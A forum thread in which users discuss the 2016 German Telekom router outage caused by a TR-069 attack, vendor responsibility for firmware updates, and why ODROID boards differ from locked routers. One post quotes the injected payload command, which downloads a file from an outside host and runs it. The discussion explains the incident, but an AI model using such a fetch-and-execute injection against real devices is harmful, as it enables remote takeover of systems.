@meveric just an actual discussion in Germany on the 33C3 - I dont know, if you ever heard about the "Plasterouter-Massaker" - I think its used only in german language, but this year 900 000 german telecom routers broke down by a TR-069-attac.
And now there is a big discussion of "Mindesthaltbarkeitsdatum für vernetzte Geräte" - minimum durability date for network devices - https://www.heise.de/newsticker/meldung ... 83224.html
And this would mean, that the vendors are responible, not the Soc producers - like netgear or linksys for the router images and hardkernel for kernel updates and of course vendors of android phones also for updates....
and I will test now with Cubieboard 3 (Cubietruck) - A20, 2 GB, 8 GB Nand, WLAN, BT, SATA - there is already a 4.9 kernel - https://www.robert-sperling.de/en/mainl ... ubietruck/
its at the moment the best compromise......
First of all, German or European law does not apply in other countries, which you should be aware of.
In fact many countries don't even care about German law inside of Germany. Most prominent probably the U.S.A. which does give a shit about other people's laws, even within in these countries own borders.
Besides that, I live in Germany and yes I heard about this issue, me and my colleauges discussed it at work.
You're actually mixing a few things up here:
The issue happend with a certain brand of very very cheap router "Plastic-Routes" as the name already said. In fact it was one brand produced by ONE company that had this issue. The same router produced by other companies didn't had this issue. The company in question was actually known for creating bad software, and had similar issues in the past.
The question here should be, why a company like Telekom works together with companies like this.
Besides that, it goes way further. These routers have a maintenance port for the ISP (called TR-069) that allows the ISP to perform firmware updates and other things. This port is normally ONLY used by the ISP. Telekom as a ISP provider totally messed up by facing this port openly to the internet, while it's rather easy for them to keep this port of this device only in their own management network.
So the first to blame is Telekom for totally messing up their security.
Second to blame is the router manifacture that messes up their router software.
And here's the thing... that's totally unrelated to the Kernel.
It's crappy preinstalled software that allowed a user to execute code.
Not the Kernel was the issue, the preinstalled software. The port was open and accepted XML for config changes, and with a simple request to add a new NTP server you could execute code:
- Code: Select all
`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`
Once again, this is extremly badly coded software and has NOTHING to do with the Kernel!
The issue here is that the company that put the software on the routers totally messed up. A software that allows something like this is broken by design.
And yes, for issues like this, the new law says the vendor is responsible, cause they put crappy software like this on the device.
And now let's come back to HardKernel and ODROID devices.
The software put on ODROIDs are 99.99% NOT from HardKernel, but from Ubuntu, Debian, Arch and so on.
The Kernel is OpenSource, everyone can read or alter the code.
ODROIDs are not tied to the the software, you can change the OS, you can change the Kernel. HardKernel sells HARDWARE not the software.
They are nice enough to put something on their devices for you to start with, they wouldn't need to, cause all info you need to create you own images is publicly available.
The restrictions for this are VERY LIMITED. The libMali.so blob is not OpenSource, and property of ARM; HardKernel is allowed to use it. If there's an issue in that software, the only one to blame is ARM, since the code comes from them!
The boot loader BL1 and BL2. BL1 is once again a blob that comes from a SoC vendor (in this case from Samsung), BL2 can be altered, but must be singed by HardKernel for it to work. The rest for example u-boot, is once again OpenSource and can be exchanged by the user.
This means you are totally free to alter the system yourself, that you don't have the skills to do so is nothing you can blame on the vendor.
This would be the same as blaming a car dealer for not selling a car that let you drive although you have never learned how to drive!
Since Mali GPU drivers are not required to run the board, that makes the BL1 blob the only part of the entire system that can't be changed and for this is the only thing that you don't have control over.
Everything else you have the chance to change or can choose if you use it or not. Hell, no one says you need to put an ODROID on the Internet in the first place!
And that is totally different compared to a divice like a router that you can not touch, where you can not alter the Kernel, or the Software that is installed.
Hell they even discussing if in future you should be allowed to put your own firmware on a router or not. This would mean the end of projects like OpenWRT, since you would no longer be allowed to put a different (probably more trusted) firmware on a router.
And that is what makes all the difference.